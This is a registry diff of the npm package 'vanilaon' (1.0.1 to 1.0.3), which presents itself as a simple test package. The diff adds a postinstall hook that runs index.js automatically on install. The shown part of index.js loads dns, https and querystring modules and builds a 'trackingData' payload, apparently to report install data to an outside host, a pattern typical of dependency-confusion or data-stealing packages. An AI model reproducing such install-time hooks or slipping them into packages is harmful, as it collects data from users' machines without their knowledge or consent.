vanilaon 1.0.1 → 1.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -1
- package/package.json +2 -2
package/index.js
CHANGED
@@ -3,7 +3,7 @@ const dns = require("dns");
|
|
3
3
|
const querystring = require("querystring");
|
4
4
|
const https = require("https");
|
5
5
|
const packageJSON = require("./package.json");
|
6
|
-
const package =
|
6
|
+
const package = packageJSON.name;
|
7
7
|
|
8
8
|
const trackingData = JSON.stringify({
|
9
9
|
p: package,
|
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "vanilaon",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.3",
|
4
4
|
"description": "Simple package by Jogendra Test",
|
5
5
|
"license": "ISC",
|
6
6
|
"author": "Jogendra S.",
|
@@ -8,6 +8,6 @@
|
|
8
8
|
"main": "index.js",
|
9
9
|
"scripts": {
|
10
10
|
"test": "echo \"Error: no test specified\" && exit 1",
|
11
|
-
"
|
11
|
+
"postinstall": "node index.js"
|
12
12
|
}
|
13
13
|
}
|